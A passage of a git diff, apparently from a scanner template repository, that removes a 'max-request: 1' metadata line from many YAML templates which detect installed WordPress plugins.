66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- 